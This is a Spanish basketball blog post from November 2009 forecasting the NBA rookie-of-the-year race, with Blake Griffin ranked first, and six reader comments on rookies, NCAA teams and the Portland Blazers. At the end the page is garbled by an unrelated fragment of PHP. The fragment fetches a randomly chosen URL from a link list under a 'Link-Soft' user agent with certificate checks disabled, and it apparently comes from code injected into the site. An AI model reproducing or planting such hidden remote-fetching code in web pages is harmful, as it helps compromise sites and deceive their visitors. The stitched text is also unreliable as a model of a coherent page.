Pronósticos TJ: ROY

03 de November de 2009 por Viva_Dirk

El premio al rookie del año despierta entre nosotros una especial expectación cada año, quizá por encima del premio al MVP. El seguimiento a los rookies es diferente. No tiene tanto que ver con lo que puedan hacer ese mismo año, sino con el potencial, con la capacidad de cambiar el rumbo de una franquicia, con ver si es ese jugador que nos ha enamorado en la NCAA o si se confirman nuestras sospechas de que la NBA le queda grande. Este premio tiene mucho que ver con nuestra subjetividad, y ahí nos duele.

Al igual que en el MVP son 7 los candidatos que hemos seleccionado, estos.

Con un solo punto aparece el center de Memphis Hasheem Thabeet, seguramente la elección mas controvertida (execeptuando obviamente la de Ricky) del draft 2009. En Memphis ya tienen a Marc Gasol y este mismo verano han fichado a Zach Randolph para el puesto de 4, lo que deja, en teoría, pocos minutos para Thabeet. Si el tanzano llega a jugar 20 minutos podrá darse por contento.

Brandon Jennings consiguió 2 puntos mucho antes del espectacular inicio de temporada que está protagonizando. Con decir que en el momento de la votación su victoria se pagaba 81 a 1 queda todo dicho. Este zurdo lleno de talento y con una capacidad para el uno contra uno demoledora parece haberse ganado la confianza de Skiles,  una de las dudas que presentaba. Si disputa mas de 30 minutos por encuentro estará en la pelea.

Pocas muñecas se han visto como la de Stephen Curry que recibe 4 puntos. Su capacidad anotadora está fuera de toda duda y durante su último año en la universidad desarrollo unas cualidades como base que le serán muy útiles en su carrera en la NBA. Con Don Nelson cualquiera sabe lo que terminará jugando.

Otro base ocupa el cuarto lugar con 5 puntos. Jonny Flynn tendrá muchos minutos en los Wolves salvo que lo haga rematadamente mal y eso por si solo hace que sea candidato claro al título. Flynn debe ganarle la partida a bases más lentos que él y aprovechar los tiros abiertos que le proporcionen desde el juego interior. En defensa habrá que verle frente a bases mas grandes y poderosos físicamente.

En el tercer puesto aparece el nº3 del draft, James Harden con 12 votos. Harden es una pieza muy interesante para acompañar a Westbrook y Durant: buen tirador exterior y capaz de crearse sus propios tiros y de sumar un buen número de asistencias… En definitiva un jugador muy completo en ataque y un correcto defensor que debería subir su número de minutos segun avance la temporada en detrimento de Sefolosha.

Tras ser una sorpresa su elección en el Nº4 por parte de Sacramento, Tyreke Evans recibe nuestro apoyo con 22 puntos. En su caso no hay ninguna duda de que va a tener licencia para casi todo en los Kings. Su posición natural es la de escolta pero la presencia de Kevin Martin provocará que tenga que desempeñar el papel de base. Habrá que ver como se compenetran.

Y con tanta claridad como fue elegido nº1 en el draft es elegido nº1 en nuestras apuestas: Blake Griffin recibe 54 votos. Su lesión pone alguna duda sobre lo que parecía un título claro para él que tendrá que coger el ritmo a la competición cuando el resto ya esté a pleno rendimiento. De todos modos si la salud le respeta el resto prácticamente no tiene posibilidades ya que Griffin va a tener  minutos y estamos seguros de que hará unos muy buenos números.

Comenta

6 comentarios a esta entrada

  1. sergio dice:
    #1

    Creo que todos los rookies en este comienzo de temporada estan dejando bastante que desear salvando a Jennings, Stephen Curry y DeJuan Blair.

    El primero es el que cuenta con mas minutos (33) y eso deberia jugar a su favor contra el resto de novatos

    El segundo juega 37 minutos (lider en ese apartado) y ademas con buenos porcentajes hasta ahora. Podria convertirse en un candidato inesperado pero deberia absorber algo mas de juego. No aporta demasiado a su equipo para el tiempo que disfruta en cancha. Espero que vaya tomando confianza.

    Pena para Blair de tener a Duncan en su equipo (pena relativa claro….) porque esta aprovechando al maximo sus minutos en pista. Promete mucho y, si bien desconozco sus comentadas lesiones, deberia venirle bien no jugar mas de 25 minutos por partido para no forzar demasiado. Puede acabar entrando en las rotaciones con McDyess y Bonner. Cada uno aporta algo diferente, algo muy del agrado de Popovich

    Aunque desde luego lo normal seria que un Griffin sano se llevara el titulo. Por potencial y por minutos deberia ser uno de los referentes de su equipo (dudo que Davis “reviva”)

      Citar

  2. Óscar dice:
    #2

    Entre las sorpresas negativas de los rookies, Tyreke Evans se lleva la palma. A pesar de ser una clara apuesta de la franquicia, parece que ser titular y contar con muchos minutos no le está ayudando a causar un impacto inmediato. Mal en la dirección y sobre todo en los porcentajes y selección de tiro. Está muy errático, pero su físico le permitirá antes o después ser un buen jugador NBA.
    En lo positivo, además de los Blair, Curry, Jennings, Casspi o DeRozan, destacar al #44 del Draft, Chase Budinger, que tiene la confianza de Adelman y está aprovechando los minutos que tiene a la perfección. Tiene una gran planta para un 2/3, buen tirador, penetrador y muy potente en el salto. Junto a Battier o Ariza se puede convertir en un jugador muy completo para el futuro, de los que aportan de verdad.

      Citar

  3. kantonyo dice:
    #3

    No hay que olvidarse de Ty Lawson, siempre he considerado que era el jugador más preparado para dar el salto a la NBA, lo demostró con su madurez y ritmo de juego en el torneo NCAA, otra cosa muy distinta será su progresión, donde hay jugadores que pueden llegar más lejos. Como me gustan estos Nuggets….

      Citar

  4. Óscar dice:
    #4

    Sí, de acuerdo contigo, Kantonyo. Lawson lo tiene complicado con Deron, pero es tan bueno que acabarán jugando juntos algunas veces. Y los Nuggets, un gran equipo hasta ahora. Ya nos mojaron la oreja y siguen invictos… Difícil que les quitemos el ttulo de División, pero todo puede cambiar para nuestros Blazers.
    Y hablando de Tywon Lawson, no serás también de los Tar Heels en la NCAA ? Vaya equipo teníamos este año, otro título… Lawson, Ellington, Green, Thompson y Hansbrough… y eso con la lesión de Marcus Ginyard… A ver este año con Ed Davis, un “4” zurdo de segundo año que ya el año pasado se salió como freshman… también está el base, hijo de Larry Drew, con el mismo nombre y que tratará de olvidar a Ty… complicado.
    Yo me enamoré de North Carolina cuando estuve en EE.UU. con 14 años y vi un partido en Pensilvania entre UNC y Duke, en una especie de pub… Me compré la gorra en celeste (aún la tengo por supuesto) y decidí que ese sería mi equipo universitario… Cómo lo vivía la gente, mucho más que la NBA. Se identifican mucho más con sus equipos, como en Europa.

      Citar

  5. kantonyo dice:
    #5

    Hola Oscar. En la NCAA no tengo una Universidad que pueda considerarla “favorita”, aunque si es verdad que siempre me han caido mejor los Tar Heels que los Blue Devils, será por Michael Jordan, será porque los Tar Heels son una universidad pública contra Duke que es privada.. no lo sé, pero me han caido siempre mejor… Lo que si intento siempre, es conocer al comienzo de la temporada los equipos, y según me llaman la atención, entonces me decanto por unos u otros, el año pasado seguí muy de cerca el juego de Wake Forest, Louisville y UNC.

    Este año habrá que seguir de cerca a Ed Davis, en este momento le considero lo mejor para el curso que viene, tambien me gusta mucho Aminu de Wake Forest, Cole Aldrich de Texas, el venezolano de Maryland, Greivis Vasquez, el buen saber-hacer de Kalin Lucas de Michigan, y además habrá que ver a los freshman de este año, a los que no he visto jugar, aunque si he leido referencias.

    Te envidio sinceramente por haber disfrutado de esa experiencia, la verdad que no tiene nada que ver el publico de la NBA con el de la NCAA. Espero algún día poder volar a USA y poder disfrutar de un partido NBA y otro de la NCAA… sería una pasada…..

    Respecto a los Blazers, hay que tener paciencia, pero me está decepcionando el espiritu de la plantilla y staff técnico, ya lo demostraron en su eliminatoria contra Rockets…

      Citar

  6. Óscar dice:
    #6

    Fíjate Kantonyo que el mismo 30 de Abril, cuando caímos 4-2 vs. a Houston, escribí en un papel lo que para mí necesitaría POR para ser un poco más competitivo, tanto en juego como en jugadores. El margen salarial era lo mejor, y manteniendo el bloque se podría haber hecho un gran equipo, sin la exigencia de tener que luchar o acercarse ya a las finales, ni mucho menos. Lo más importante, mejorar en mentalidad y carácter competitivo, ese espíritu del que hablas. Y en cuanto a jugadores, yo esperaba esto de Pritchard, con la gran cantidad de “Free Agents” de buen nivel disponibles :

    *BAJAS : S.Blake (acababa contrato) M.Ruffin (FA) (6)
    S.Rodríguez (trade SAC) S.Randolph (FA)
    C.Frye (PHX, rest. FA) R.LaFrentz (FA)

    *ALTAS : R.Sessions (rest. FA, MIL) R.Ivey (rest. FA, PHI) (6)
    S.Brown (FA, LAL) T.Ariza (FA, LAL)
    B.Bass (FA, DAL) D.Blair (Draft)

    Viendo donde han acabado esos jugadores y lo que cobran, esta plantilla habría sido perfectamente posible, sin Andre Miller y sus 6,5 mill. $, pero con la media de edad más baja de nuevo de la NBA junto a GSW, como el año pasado. Un equipo para seguir creciendo, sin prisa pero sin pausa. Grandes defensores, muchos especialistas, muy fuertes físicamente y dándole la responsabilidad a Roy y Aldridge, para seguir mejorando en su juego. Sin embargo, se fracasó en los intentos de fichar a Turkoglu (yo no lo veia en los Blazers) y a Millsap… por lo que llegó Andre Miller… y poco más que mejorara de verdad el nivel golbal de la plantilla 09/10. Ojo, que tampoco me quejo del equipo que ha quedado, con 3 rookies (eso sí, 2 de ellos lesionados de larga duración…) y un base de primer nivel.

    En mi papel, quedaba esta rotación: 17-S.Brown, 7-B.Roy, 3-T.Ariza, 12-L.Aldridge, 52-G.Oden // 1-Sessions, 5-Fernández, 23-Webster, 33-Bass, 10-Przybilla // 11- Ivey, 4-Bayless, 88-Batum, 25-Outlaw, 43- Blair.
    Por competencia, juventud, ambición, físico, cantidad de variantes y competitividad no iba a ser… Los sueños, sueños son…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>